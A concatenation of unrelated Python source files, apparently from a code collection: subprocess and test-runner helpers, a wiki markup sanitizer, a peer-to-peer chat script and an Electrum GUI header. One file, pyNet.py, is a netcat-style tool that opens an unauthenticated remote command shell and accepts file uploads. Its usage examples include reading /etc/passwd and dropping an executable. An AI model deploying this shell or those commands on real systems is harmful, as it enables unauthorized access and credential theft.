    for name, base in local_globs.items():
        if not isinstance(base, type):
            continue
        if issubclass(base, BaseTestCase):
            if base is BaseTestCase:
                continue
            assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
            for type_ in base.ALLOWED_TYPES:
                # e.g. _TestFoo + 'processes' -> WithProcessesTestFoo
                newname = 'With' + type_.capitalize() + name[1:]
                Mixin = local_globs[type_.capitalize() + 'Mixin']
                class Temp(base, Mixin, unittest.TestCase):
                    pass
                if type_ == 'manager':
                    # manager proxies authenticate with an md5 digest
                    Temp = hashlib_helper.requires_hashdigest('md5')(Temp)
                Temp.__name__ = Temp.__qualname__ = newname
                Temp.__module__ = __module__
                remote_globs[newname] = Temp
        elif issubclass(base, unittest.TestCase):
            class Temp(base, object):
                pass
            Temp.__name__ = Temp.__qualname__ = name
            Temp.__module__ = __module__
            remote_globs[name] = Temp

    # one-element containers so the nested hooks below can rebind state
    dangling = [None, None]
    old_start_method = [None]

    def setUpModule():
        multiprocessing.set_forkserver_preload(PRELOAD)
        multiprocessing.process._cleanup()
        dangling[0] = multiprocessing.process._dangling.copy()
        dangling[1] = threading._dangling.copy()
        old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
        try:
            multiprocessing.set_start_method(start_method, force=True)
        except ValueError:
            raise unittest.SkipTest(start_method +
                                    ' start method not supported')

        if sys.platform.startswith("linux"):
            try:
                lock = multiprocessing.RLock()
            except OSError:
                raise unittest.SkipTest("OSError raises on RLock creation, "
                                        "see issue 3111!")
        check_enough_semaphores()
        util.get_temp_dir()  # creates temp directory
        multiprocessing.get_logger().setLevel(LOG_LEVEL)

    def tearDownModule():
        need_sleep = False

        # bpo-26762: Some multiprocessing objects like Pool create reference
        # cycles. Trigger a garbage collection to break these cycles.
        test.support.gc_collect()

        multiprocessing.set_start_method(old_start_method[0], force=True)
        # pause a bit so we don't get warning about dangling threads/processes
        processes = set(multiprocessing.process._dangling) - set(dangling[0])
        if processes:
            need_sleep = True
            test.support.environment_altered = True
            support.print_warning(f'Dangling processes: {processes}')
        processes = None

        threads = set(threading._dangling) - set(dangling[1])
        if threads:
            need_sleep = True
            test.support.environment_altered = True
            support.print_warning(f'Dangling threads: {threads}')
        threads = None

        # Sleep 500 ms to give time to child processes to complete.
        if need_sleep:
            time.sleep(0.5)

        multiprocessing.util._cleanup_tests()

    remote_globs['setUpModule'] = setUpModule
    remote_globs['tearDownModule'] = tearDownModule
|
subproc.py | #! env python
# should work with Python 2.7 and 3.x
# subproc.py
from __future__ import print_function
import logging
import os
import shlex
import signal
import subprocess
import sys
import threading
from collections import namedtuple
from multiprocessing import TimeoutError
try:
from itertools import izip
except ImportError:
izip = zip
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
logger = logging.getLogger(os.path.basename(__file__.replace('.py', '')))
RunResult = namedtuple('RunResult', ['pid', 'return_code', 'stdout', 'stderr'])
RunRedirectedResult = namedtuple('RunRedirectedResult', ['pid', 'return_code'])
Info = namedtuple('Info', ['cmd', 'pid', 'return_code'])
RunCmdsResult = namedtuple('RunCmdsResult', ['infos', 'stdout', 'stderr'])
RunCmdsRedirectedResult = namedtuple('RunCmdsRedirectedResult', ['info'])
DEVNULL = None
def run(cmd, timeoutsec=None, formatter=None):
    """\
    Execute *cmd* and capture its stdout and stderr into strings.

    The resulting process and all its children are grouped together in a
    process group; on timeout the whole group is terminated.

    :param cmd: the command to execute
    :param timeoutsec: interrupts the process after the timeout (in seconds)
    :param formatter: function accepting and returning the line to print
    :return: :py:class:`RunResult`

    Example::

        r = run('echo hello world', formatter=str.upper)
        assert r.stdout.strip() == 'HELLO WORLD'
    """
    captured_out, captured_err = StringIO(), StringIO()
    redirected = run_redirected(
        cmd,
        out=captured_out,
        err=captured_err,
        timeoutsec=timeoutsec,
        formatter=formatter,
    )
    return RunResult(
        redirected.pid,
        redirected.return_code,
        captured_out.getvalue(),
        captured_err.getvalue(),
    )
def run_redirected(cmd, out=sys.stdout, err=sys.stderr, timeoutsec=None, formatter=None):
    """\
    Execute *cmd*, redirecting its output if applicable.

    The resulting process and all its children are grouped together in a
    process group; on timeout the whole group is terminated.

    :param cmd: the command to execute
    :param out: file-like object to write the stdout to (default sys.stdout, None -> os.devnull)
    :param err: file-like object to write the stderr to (default sys.stderr, None -> os.devnull)
    :param timeoutsec: interrupts the process after the timeout (in seconds)
    :param formatter: function accepting and returning the line to print
    :return: :py:class:`RunRedirectedResult`

    Example::

        with open('proc.log', 'w') as f:
            r = run_redirected('echo hello world', out=f, formatter=str.upper)
            assert r.return_code == 0
    """
    process = pipe_processes([cmd], total=1, out=out, err=err)[0]
    consume_pipes([process], out, err, timeoutsec, formatter)
    process.wait()  # collect the exit status
    return RunRedirectedResult(process.pid, process.returncode)
def run_cmds(cmds, timeoutsec=None, formatter=None):
    """\
    Execute *cmds* piped together, capturing stdout and stderr into strings.

    The resulting processes and all their children are grouped together in a
    process group; on timeout the whole group is terminated.

    :param cmds: the commands to execute
    :param timeoutsec: interrupts the processes after the timeout (in seconds)
    :param formatter: function accepting and returning the line to print
    :return: :py:class:`RunCmdsResult`

    Example::

        r = run_cmds(['echo hello world', 'sed s/hello/bye/g'])
        assert r.stdout.strip() == 'bye world'
    """
    stdout_buf = StringIO()
    stderr_buf = StringIO()
    redirected = run_cmds_redirected(cmds, out=stdout_buf, err=stderr_buf,
                                     timeoutsec=timeoutsec, formatter=formatter)
    infos = [item.info for item in redirected]
    return RunCmdsResult(infos, stdout_buf.getvalue(), stderr_buf.getvalue())
def run_cmds_redirected(cmds, out=sys.stdout, err=sys.stderr, timeoutsec=None, formatter=None):
    """\
    Execute *cmds* piped together, redirecting output if applicable.

    The resulting processes and all their children are grouped together in a
    process group; on timeout the whole group is terminated.

    :param cmds: the commands to execute
    :param out: file-like object to write the stdout to (default sys.stdout, None -> os.devnull)
    :param err: file-like object to write the stderr to (default sys.stderr, None -> os.devnull)
    :param timeoutsec: interrupts the processes after the timeout (in seconds)
    :param formatter: function accepting and returning the line to print
    :return: list of :py:class:`RunCmdsRedirectedResult`, one per command
    :raises ValueError: if *cmds* is empty

    Example::

        with open('proc.log', 'w') as f:
            results = run_cmds_redirected(['echo hello world', 'sed s/hello/bye/g'], out=f)
            assert all(r.info.return_code == 0 for r in results)
    """
    if not cmds:
        # BUG FIX: the original *returned* a ValueError instance instead of
        # raising it, so callers silently received an exception object.
        raise ValueError('No commands defined')
    processes = pipe_processes(cmds, len(cmds), out, err)
    consume_pipes(processes, out, err, timeoutsec, formatter)
    # pull return codes
    for cmd, p in izip(cmds, processes):
        p.wait()
        logger.debug("Command '{}' completed".format(cmd))
    return [RunCmdsRedirectedResult(info=Info(cmd, p.pid, p.returncode))
            for cmd, p in izip(cmds, processes)]
def consume_pipes(processes, out, err, timeoutsec, formatter):
    """Drain the stdout/stderr pipes of the last process in *processes*.

    One daemon thread per redirected stream copies lines (optionally passed
    through *formatter*) into *out*/*err*. If the threads do not finish
    within *timeoutsec*, every process (group) is terminated. All pipes are
    closed on the way out to avoid deadlocks on broken pipes.
    """
    def write(input, output):
        logger.debug('Started pipe consuming thread')
        for line in iter(input.readline, ''):
            formatted_line = formatter(line) if formatter else line
            output.write(formatted_line)
        logger.debug('Thread stopped')

    # only the tail of the pipeline is wired to PIPE for out/err
    last = processes[-1]
    threads = []
    try:
        # start consuming pipes (only when redirected away from our own streams)
        if out and out != sys.stdout:
            t = threading.Thread(target=write, args=(last.stdout, out))
            t.daemon = True
            threads.append(t)
        if err and err != sys.stderr:
            t = threading.Thread(target=write, args=(last.stderr, err))
            t.daemon = True
            threads.append(t)
        for t in threads:
            t.start()
        for t in threads:
            t.join(timeout=timeoutsec)
        if any((t.is_alive() for t in threads)):
            raise TimeoutError
    except TimeoutError:
        # BUG FIX: was logging.warn(...) — deprecated alias on the *root*
        # logger; use this module's logger and the supported .warning().
        logger.warning('Terminating process due to timeout')
        for p in processes:
            if os.name == 'posix':
                # processes were started as group leaders: signal the group
                os.killpg(p.pid, signal.SIGTERM)
            elif os.name == 'nt':
                os.kill(p.pid, signal.CTRL_C_EVENT)
    finally:
        # process might have been killed so wait until threads are shut down otherwise
        # -> IOError: close() called during concurrent operation on the same file object
        for t in threads:
            t.join()
        for p in processes:
            # close pipe otherwise we might run into a dead lock, e.g.
            # when a pipe consuming process stops reading (BrokenPipeError)
            close_pipes(p)
def process_params(out, err):
    """Build the keyword arguments for subprocess.Popen.

    Always enables universal_newlines and makes the child a process-group
    leader (platform dependent). stdout/stderr entries are added per stream:
    PIPE when redirected to a custom file object, devnull when falsy, and
    omitted entirely when the stream is the parent's own sys.stdout/stderr.
    """
    params = {'universal_newlines': True}

    # make progress group leader so that signals are directed its children as well
    if os.name == 'posix':
        params['preexec_fn'] = os.setpgrp
    elif os.name == 'nt':
        params['creationflags'] = subprocess.CREATE_NEW_PROCESS_GROUP

    def _devnull():
        # subprocess.DEVNULL is unavailable on Python 2.7
        try:
            return subprocess.DEVNULL
        except AttributeError:
            return open(os.devnull, 'w')

    # notice that the pipes need to be consumed, otherwise this python
    # process blocks once the pipe reaches its capacity limit
    # (on linux 16 pages = 65,536 bytes)
    if out and out != sys.stdout:
        params['stdout'] = subprocess.PIPE
    elif not out:
        params['stdout'] = _devnull()
    if err and err != sys.stderr:
        params['stderr'] = subprocess.PIPE
    elif not err:
        params['stderr'] = _devnull()
    return params
def close_pipes(p):
    """Close the stdout/stderr pipe handles of process *p*, if any."""
    if not p:
        return
    for pipe in (p.stdout, p.stderr):
        if pipe:
            pipe.close()
def pipe_processes(cmds, total, out, err):
    """Recursively spawn *cmds*, piping each command's stdout into the next.

    *total* is the length of the complete pipeline; it distinguishes
    intermediate commands (whose stdout must be a PIPE feeding the next
    command) from the final one (whose stdout follows the *out* rules).

    :return: list of Popen objects in pipeline order
    :raises OSError: if a command cannot be started; pipes opened so far are
        closed before re-raising
    """
    processes = []
    try:
        cmd = "".join(cmds[-1:])
        params = process_params(out, err)
        if cmds[:-1]:
            processes = list(pipe_processes(cmds[:-1], total, out, err))
            intermediate_cmd = total != len(cmds)
            if intermediate_cmd:
                # BUG FIX: the log message was missing .format(cmd), so the
                # '{}' placeholder was emitted literally.
                logger.debug("Redirected command '{}' output to PIPE".format(cmd))
                params["stdout"] = subprocess.PIPE
            logger.debug("Running cmd {}: {}".format(len(cmds), cmd))
            processes.append(subprocess.Popen(shlex.split(cmd), close_fds=True,
                                              stdin=processes[-1].stdout, **params))
        else:
            logger.debug("Running cmd {}: {}".format(len(cmds), cmd))
            if total > 1:
                # BUG FIX: missing .format(cmd) here as well
                logger.debug("Redirected command '{}' output to PIPE".format(cmd))
                params["stdout"] = subprocess.PIPE
            processes.append(subprocess.Popen(shlex.split(cmd), close_fds=True, **params))
        return processes
    # catch errors when creating process (e.g. if command was not found)
    except OSError as e:
        logger.error("Running last cmd failed: {}".format(str(e)))
        for p in processes:
            close_pipes(p)
        # bare raise preserves the original traceback
        raise
|
wireless_chat.py | """
Send text to other devices running this script remotely.
"""
import multipeer
from console import clear
from time import sleep
from threading import Thread
from PIL import Image
done = False
def loop():
    # Background receiver: poll the multipeer session and repaint the console
    # whenever a new message arrives. Runs until the module-level ``done``
    # flag is set by the main thread.
    while not done:
        data = multipeer.get_data()
        if data is not None:
            clear()
            print(data)
            print("> ", end="")
        sleep(0.2)  # avoid busy-waiting between polls
# Start the receiver thread, join the mesh, then forward console input.
Thread(target=loop).start()
multipeer.connect()
try:
    while True:
        multipeer.send(input("> "))
except:  # noqa: E722 — deliberately catch-all (Ctrl-C, EOF on stdin, ...)
    # BUG FIX: was ``done = False``, which left the receiver thread spinning
    # forever after the input loop exited. True tells loop() to stop.
    done = True
|
utils.py | import glob
import hashlib
import logging
import os
import shutil
import subprocess
from functools import wraps
from tempfile import gettempdir
from threading import Thread
import requests
from timeout_decorator import timeout
from utils.constants import Constant
from utils.format import Format
logger = logging.getLogger('testrunner')
_stepdepth = 0
def step(f):
    """Decorator logging entry/exit of *f* with depth-based dot indentation."""
    @wraps(f)
    def wrapper(*args, **kwargs):
        global _stepdepth
        _stepdepth += 1
        logger.debug("{} entering {} {}".format(Format.DOT * _stepdepth,
                                                f.__name__, f.__doc__ or ""))
        outcome = f(*args, **kwargs)
        logger.debug("{} exiting {}".format(Format.DOT_EXIT * _stepdepth,
                                            f.__name__))
        _stepdepth -= 1
        return outcome
    return wrapper
class Utils:
    """Test-runner helpers: recursive chmod, file/socket cleanup, ssh/scp/
    rsync wrappers and shell-command execution rooted at the workspace."""

    def __init__(self, conf):
        self.conf = conf

    @staticmethod
    def chmod_recursive(directory, permissions):
        """Apply *permissions* to *directory* and everything below it.

        Per-entry failures are logged and skipped so a single unreadable
        entry does not abort the walk."""
        os.chmod(directory, permissions)
        for file in glob.glob(os.path.join(directory, "**/*"), recursive=True):
            try:
                os.chmod(file, permissions)
            except Exception as ex:
                logger.debug(ex)

    @staticmethod
    def cleanup_file(file):
        """Best-effort removal of a file, socket, or directory tree."""
        if os.path.exists(file):
            logger.debug(f"Cleaning up {file}")
            try:
                try:
                    # Attempt to remove the file first, because a socket (e.g.
                    # ssh-agent) is not a file but has to be removed like one.
                    os.remove(file)
                except IsADirectoryError:
                    shutil.rmtree(file)
            except Exception as ex:
                logger.debug(ex)
        else:
            logger.debug(f"Nothing to clean up for {file}")

    @staticmethod
    def cleanup_files(files):
        """Remove any files or dirs in a list if they exist"""
        for file in files:
            Utils.cleanup_file(file)

    def ssh_cleanup(self):
        """Remove ssh sock files"""
        # TODO: also kill ssh agent here? maybe move pkill to kill_ssh_agent()?
        sock_file = self.ssh_sock_fn()
        sock_dir = os.path.dirname(sock_file)
        try:
            Utils.cleanup_file(sock_file)
            # also remove tempdir if it's empty afterwards
            if 0 == len(os.listdir(sock_dir)):
                os.rmdir(sock_dir)
            else:
                logger.warning(f"Dir {sock_dir} not empty; leaving it")
        except FileNotFoundError:
            pass
        except OSError as ex:
            logger.debug(ex)

    def collect_remote_logs(self, ip_address, logs, store_path):
        """
        Collect logs from a remote machine
        :param ip_address: (str) IP of the machine to collect the logs from
        :param logs: (dict: list) The different logs to collect {"files": [], "dirs": [], "services": []}
        :param store_path: (str) Path to copy the logs to
        :return: (bool) True if there was an error while collecting the logs
        """
        logging_errors = False
        for log in logs.get("files", []):
            try:
                self.scp_file(ip_address, log, store_path)
            except Exception as ex:
                logger.debug(
                    f"Error while collecting {log} from {ip_address}\n {ex}")
                logging_errors = True
        for log in logs.get("dirs", []):
            try:
                self.rsync(ip_address, log, store_path)
            except Exception as ex:
                logger.debug(
                    f"Error while collecting {log} from {ip_address}\n {ex}")
                logging_errors = True
        for service in logs.get("services", []):
            try:
                self.ssh_run(
                    ip_address, f"sudo journalctl -xeu {service} > {service}.log")
                self.scp_file(ip_address, f"{service}.log", store_path)
            except Exception as ex:
                logger.debug(
                    f"Error while collecting {service}.log from {ip_address}\n {ex}")
                logging_errors = True
        return logging_errors

    def authorized_keys(self):
        """Return the public key text for conf.ssh_key (also tightens the
        private key to 0400, as ssh requires)."""
        public_key_path = self.conf.ssh_key + ".pub"
        os.chmod(self.conf.ssh_key, 0o400)
        with open(public_key_path) as f:
            pubkey = f.read().strip()
        return pubkey

    def ssh_run(self, ipaddr, cmd):
        """Run *cmd* on the remote node *ipaddr* via ssh; return its stdout."""
        key_fn = self.conf.ssh_key
        cmd = "ssh " + Constant.SSH_OPTS + " -i {key_fn} {username}@{ip} -- '{cmd}'".format(
            key_fn=key_fn, ip=ipaddr, cmd=cmd, username=self.conf.nodeuser)
        return self.runshellcommand(cmd)

    def scp_file(self, ip_address, remote_file_path, local_file_path):
        """
        Copies a remote file from the given ip to the give path
        :param ip_address: (str) IP address of the node to copy from
        :param remote_file_path: (str) Path of the file to be copied
        :param local_file_path: (str) Path where to store the log
        :return:
        """
        cmd = (f"scp {Constant.SSH_OPTS} -i {self.conf.ssh_key}"
               f" {self.conf.nodeuser}@{ip_address}:{remote_file_path} {local_file_path}")
        self.runshellcommand(cmd)

    def rsync(self, ip_address, remote_dir_path, local_dir_path):
        """
        Copies a remote dir from the given ip to the give path
        :param ip_address: (str) IP address of the node to copy from
        :param remote_dir_path: (str) Path of the dir to be copied
        :param local_dir_path: (str) Path where to store the dir
        :return:
        """
        cmd = (f'rsync -avz --no-owner --no-perms -e "ssh {Constant.SSH_OPTS} -i {self.conf.ssh_key}" '
               f'--rsync-path="sudo rsync" --ignore-missing-args {self.conf.nodeuser}@{ip_address}:{remote_dir_path} '
               f'{local_dir_path}')
        self.runshellcommand(cmd)

    def runshellcommand(self, cmd, cwd=None, env=None, ignore_errors=False):
        """Running shell command in {workspace} if cwd == None
           Eg) cwd is "skuba", cmd will run shell in {workspace}/skuba/
               cwd is None, cmd will run in {workspace}
               cwd is abs path, cmd will run in cwd
        Keyword arguments:
        cmd -- command to run
        cwd -- dir to run the cmd
        env -- environment variables (default: empty environment)
        ignore_errors -- don't raise exception if command fails
        """
        # BUG FIX: env={} was a mutable default argument. Behavior is kept:
        # by default the child still receives an empty environment.
        if env is None:
            env = {}
        if not cwd:
            cwd = self.conf.workspace
        if not os.path.isabs(cwd):
            cwd = os.path.join(self.conf.workspace, cwd)
        if not os.path.exists(cwd):
            raise FileNotFoundError(Format.alert("Directory {} does not exists".format(cwd)))
        if logging.DEBUG >= logger.level:
            logger.debug("Executing command\n"
                         "    cwd: {} \n"
                         "    env: {}\n"
                         "    cmd: {}".format(cwd, str(env) if env else "{}", cmd))
        else:
            logger.info("Executing command {}".format(cmd))
        stdout, stderr = [], []
        p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, env=env, cwd=cwd)
        stdoutStreamer = Thread(target=self.read_fd, args=(p, p.stdout, logger.debug, stdout))
        stderrStreamer = Thread(target=self.read_fd, args=(p, p.stderr, logger.error, stderr))
        stdoutStreamer.start()
        stderrStreamer.start()
        stdoutStreamer.join()
        stderrStreamer.join()
        # this is redundant, at this point threads were joined and they waited for the subprocess
        # to exit, however it should not hurt to explicitly wait for it again (no-op).
        p.wait()
        stdout, stderr = "".join(stdout), "".join(stderr)
        if p.returncode != 0:
            if not ignore_errors:
                raise RuntimeError("Error executing command {}".format(cmd))
            else:
                return stderr
        return stdout

    def ssh_sock_fn(self):
        """generate path to ssh socket

        A socket path can't be over 107 chars on Linux, so generate a short
        hash of the workspace and use that in $TMPDIR (usually /tmp) so we have
        a predictable, test-unique, fixed-length path.
        """
        path = os.path.join(
            gettempdir(),
            hashlib.md5(self.conf.workspace.encode()).hexdigest(),
            "ssh-agent-sock"
        )
        maxl = 107
        if len(path) > maxl:
            raise Exception(f"Socket path '{path}' len {len(path)} > {maxl}")
        return path

    def read_fd(self, proc, fd, logger_func, output):
        """Read from fd, logging using logger_func

        Read from fd, until proc is finished. All contents will
        also be appended onto output."""
        while True:
            contents = fd.readline().decode()
            if contents == '' and proc.poll() is not None:
                return
            if contents:
                output.append(contents)
                logger_func(contents.strip())

    @timeout(60)
    @step
    def setup_ssh(self):
        """Start a dedicated ssh-agent on a predictable socket and add the key."""
        os.chmod(self.conf.ssh_key, 0o400)
        # use a dedicated agent to minimize stateful components
        sock_fn = self.ssh_sock_fn()
        # be sure directory containing socket exists and socket doesn't exist
        if os.path.exists(sock_fn):
            try:
                if os.path.isdir(sock_fn):
                    # BUG FIX: os.path has no rmdir(); the original
                    # os.path.rmdir raised AttributeError. os.rmdir only
                    # removes an empty dir, which is the intent here.
                    os.rmdir(sock_fn)
                else:
                    os.remove(sock_fn)
            except FileNotFoundError:
                pass
        try:
            os.mkdir(os.path.dirname(sock_fn), mode=0o700)
        except FileExistsError:
            if os.path.isdir(os.path.dirname(sock_fn)):
                pass
            else:
                raise
        # clean up old ssh agent process(es); failure just means there was
        # nothing to kill, so it is deliberately swallowed
        try:
            self.runshellcommand("pkill -f 'ssh-agent -a {}'".format(sock_fn))
            logger.warning("Killed previous instance of ssh-agent")
        except Exception:
            pass
        self.runshellcommand("ssh-agent -a {}".format(sock_fn))
        self.runshellcommand(
            "ssh-add " + self.conf.ssh_key, env={"SSH_AUTH_SOCK": sock_fn})

    @timeout(30)
    @step
    def info(self):
        """Node info"""
        info_lines = "Env vars: {}\n".format(sorted(os.environ))
        info_lines += self.runshellcommand('ip a')
        info_lines += self.runshellcommand('ip r')
        info_lines += self.runshellcommand('cat /etc/resolv.conf')
        # TODO: the logic for retrieving external is platform depedant and should be
        # moved to the corresponding platform
        try:
            r = requests.get(
                'http://169.254.169.254/2009-04-04/meta-data/public-ipv4', timeout=2)
            r.raise_for_status()
        except (requests.HTTPError, requests.Timeout) as err:
            logger.warning(
                f'Meta Data service unavailable could not get external IP addr{err}')
        else:
            info_lines += 'External IP addr: {}'.format(r.text)
        return info_lines
|
mark.py | from .set_mark.namu import namu
from .set_mark.markdown import markdown
import re
import html
import sqlite3
import urllib.parse
import threading
import multiprocessing
def load_conn2(data):
    """Bind the module-level ``conn``/``curs`` globals to the DB-API
    connection *data* and a fresh cursor created from it."""
    global conn, curs
    conn = data
    curs = conn.cursor()
def send_parser(data):
    """Sanitize user text for display: HTML-escape everything except a
    literal ``<br>``, strip ``javascript:`` URI schemes, and rewrite bare
    ``<a>...</a>`` tags into wiki links under ``/w/``."""
    anchor_pat = r'<a(?: (?:(?:(?!>).)*))?>(?P<in>(?:(?!<).)*)<\/a>'
    if not re.search('^<br>$', data):
        data = html.escape(data)
    data = re.sub('javascript:', '', data, flags=re.I)
    while True:
        match = re.search(anchor_pat, data)
        if not match:
            break
        inner = match.group('in')
        link = '<a href="/w/' + urllib.parse.quote(inner).replace('/', '%2F') + '">' + inner + '</a>'
        data = re.sub(anchor_pat, link, data, 1)
    return data
def plusing(data):
    # Insert backlink rows (title, link, type) into the ``back`` table,
    # skipping triples that already exist. Relies on the module-global
    # ``curs`` cursor installed by load_conn2().
    # NOTE(review): namumark() calls this from worker threads, but sqlite
    # cursors are not thread-safe — confirm the threads never overlap.
    for data_in in data:
        curs.execute("select title from back where title = ? and link = ? and type = ?", [data_in[1], data_in[0], data_in[2]])
        if not curs.fetchall():
            curs.execute("insert into back (title, link, type) values (?, ?, ?)", [data_in[1], data_in[0], data_in[2]])
def namumark(title, data, num, include):
    """Render *data* with the wiki's configured markup engine.

    The engine name is read from the ``other`` table ('namumark',
    'markdown' or 'raw'). With num == 1 the backlinks in data[2] are also
    recorded and the connection committed; num == 2 returns [body, footer];
    any other num returns body + footer as one string.
    """
    curs.execute('select data from other where name = "markup"')
    rep_data = curs.fetchall()
    if rep_data[0][0] == 'namumark':
        data = namu(conn, data, title, num, include)
    elif rep_data[0][0] == 'markdown':
        data = markdown(conn, data, title, num)
    elif rep_data[0][0] == 'raw':
        data = [data, '', []]
    else:
        data = ['', '', []]
    if num == 1:
        # split the backlink list into cpu_count() roughly equal chunks;
        # the last chunk absorbs the remainder
        data_num = len(data[2])
        data_in_num = int(data_num / multiprocessing.cpu_count())
        data_in = []
        for i in range(multiprocessing.cpu_count()):
            if i != multiprocessing.cpu_count() - 1:
                data_in += [data[2][data_in_num * i:data_in_num * (i + 1)]]
            else:
                data_in += [data[2][data_in_num * i:]]
        for data_in_for in data_in:
            # NOTE(review): each thread is join()ed immediately, so the
            # chunks actually run one after another — presumably deliberate,
            # since the shared sqlite cursor is not thread-safe; confirm.
            thread_start = threading.Thread(target = plusing, args = [data_in_for])
            thread_start.start()
            thread_start.join()
        conn.commit()
    if num == 2:
        return [data[0], data[1]]
    else:
        return data[0] + data[1]
pyNet.py | #! ~/git/Code/scripts/
# Author : Garrett Lender
# Date : 2017 May 15
# Purpose : This script allows for the processing of comands on an external machine, listening on a port on a host machine for incoming connections,
# execution of a certain file once connection to a host machine is made, and can initialise a command shell.
import sys
import socket
import getopt
import threading
import subprocess
# globals (populated by main() from the command-line options)
listen = False            # -l: act as a server and listen for connections
command = False           # -c: offer an interactive command shell
upload = False            # unused flag; upload_destination drives uploads
execute = ""              # -e: command to execute on connection
target = ""               # -t: host to connect to / bind on
upload_destination = ""   # -u: path to write an uploaded file to
port = 0                  # -p: TCP port
# this runs a command and returns the output
def run_command(command):
    """Run *command* in a shell and return its combined stdout+stderr.

    On any failure a generic error string is returned instead of raising,
    so the caller can always send something back to the client.
    """
    # trim the newline
    command = command.rstrip()
    # run the command and get the output back
    try:
        output = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True)
    except Exception:
        # BUG FIX: was a bare ``except:`` which also swallowed SystemExit
        # and KeyboardInterrupt.
        output = "Failed to execute command.\r\n"
    # send the output back to the client
    return output
# this handles incoming client connections
def client_handler(client_socket):
    # Service one client connection: optionally receive an upload, run the
    # configured command, and/or drop into an interactive shell loop.
    # NOTE(review): written for Python 2 — send()/recv() here operate on str;
    # under Python 3 these would need bytes.
    global upload
    global execute
    global command
    # check for upload
    if len(upload_destination):
        # read in all of the bytes and write to our destination
        file_buffer = ""
        # keep reading data until none is available
        while True:
            data = client_socket.recv(1024)
            if not data:
                break
            else:
                file_buffer += data
        # now we take these bytes and try to write them out
        try:
            file_descriptor = open(upload_destination,"wb")
            file_descriptor.write(file_buffer)
            file_descriptor.close()
            # acknowledge that we wrote the file out
            client_socket.send("Successfully saved file to %s\r\n" % upload_destination)
        except:
            client_socket.send("Failed to save file to %s\r\n" % upload_destination)
    # check for command execution
    if len(execute):
        # run the command
        output = run_command(execute)
        client_socket.send(output)
    # now we go into another loop if a command shell was requested
    if command:
        while True:
            # show a simple prompt
            client_socket.send("<PY NET :#> ")
            # now we receive until we see a linefeed (enter key)
            cmd_buffer = ""
            while "\n" not in cmd_buffer:
                cmd_buffer += client_socket.recv(1024)
            # we have a valid command so execute it and send back the results
            response = run_command(cmd_buffer)
            # send back the response
            client_socket.send(response)
# this is for incoming connections
def server_loop():
    """Bind to target:port and hand every accepted client to its own thread."""
    global target
    global port
    # with no explicit target, listen on all interfaces
    if not len(target):
        target = "0.0.0.0"
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind((target, port))
    listener.listen(5)
    while True:
        client_socket, addr = listener.accept()
        # one handler thread per client
        handler = threading.Thread(target=client_handler, args=(client_socket,))
        handler.start()
# if we don't listen we are a client....make it so.
def client_sender(buffer):
    # Client mode: connect to target:port, send *buffer* (data piped in on
    # stdin), then alternate between printing server responses and forwarding
    # further user input. (Python 2: raw_input / print statement.)
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        # connect to our target host
        client.connect((target,port))
        # if we detect input from stdin send it
        # if not we are going to wait for the user to punch some in
        if len(buffer):
            client.send(buffer)
        while True:
            # now wait for data back
            recv_len = 1
            response = ""
            while recv_len:
                data = client.recv(4096)
                recv_len = len(data)
                response+= data
                # a short read means the server is done talking for now
                if recv_len < 4096:
                    break
            print response,
            # wait for more input
            buffer = raw_input("")
            buffer += "\n"
            # send it off
            client.send(buffer)
    except:
        # catch generic errors
        print "[*] Exception! Exiting."
        # teardown the connection
        client.close()
def usage():
    # Print the CLI help text and exit the program. (Python 2 print statements.)
    print "Netcat Replacement"
    print
    print "Usage: pyNet.py -t target_host -p port"
    print "-l --listen                - listen on [host]:[port] for incoming connections"
    print "-e --execute=file_to_run   - execute the given file upon receiving a connection"
    print "-c --command               - initialize a command shell"
    print "-u --upload=destination    - upon receiving connection upload a file and write to [destination]"
    print
    print
    print "Examples: "
    print "pyNet.py -t 192.168.0.1 -p 7777 -l -c"
    print "pyNet.py -t 192.168.0.1 -p 7777 -l -u=c:\\target.exe"
    print "pyNet.py -t 192.168.0.1 -p 7777 -l -e=\"cat /etc/passwd\""
    print "echo 'ABCDEFGHI' | ./pyNet.py -t 192.168.11.12 -p 135"
    sys.exit(0)
def main():
global listen
global port
global execute
global command
global upload_destination
global target
if not len(sys.argv[1:]):
usage()
# read the commandline options
try:
opts, args = getopt.getopt(sys.argv[1:],"hle:t:p:cu:",["help","listen","execute","target","port","command","upload"])
except getopt.GetoptError as err:
print str(err)
usage()
for o,a in opts:
if o in ("-h","--help"):
usage()
elif o in ("-l","--listen"):
listen = True
elif o in ("-e", "--execute"):
execute = a
elif o in ("-c", "--commandshell"):
command = True
elif o in ("-u", "--upload"):
upload_destination = a
elif o in ("-t", "--target"):
target = a
elif o in ("-p", "--port"):
port = int(a)
else:
assert False,"Unhandled Option"
# are we going to listen or just send data from stdin
if not listen and len(target) and port > 0:
# read in the buffer from the commandline
# this will block, so send CTRL-D if not sending input
# to stdin
buffer = sys.stdin.read()
# send data off
client_sender(buffer)
# we are going to listen and potentially
# upload things, execute commands and drop a shell back
# depending on our command line options above
if listen:
server_loop()
main()
|
main_window.py | import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import electrum
from electrum.bitcoin import TYPE_ADDRESS
from electrum import WalletStorage, Wallet
from electrum_gui.kivy.i18n import _
from electrum.paymentrequest import InvoiceStore
from electrum.util import profiler, InvalidPassword
from electrum.plugins import run_hook
from electrum.util import format_satoshis, format_satoshis_plain
from electrum.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_gui.kivy.uix.dialogs')
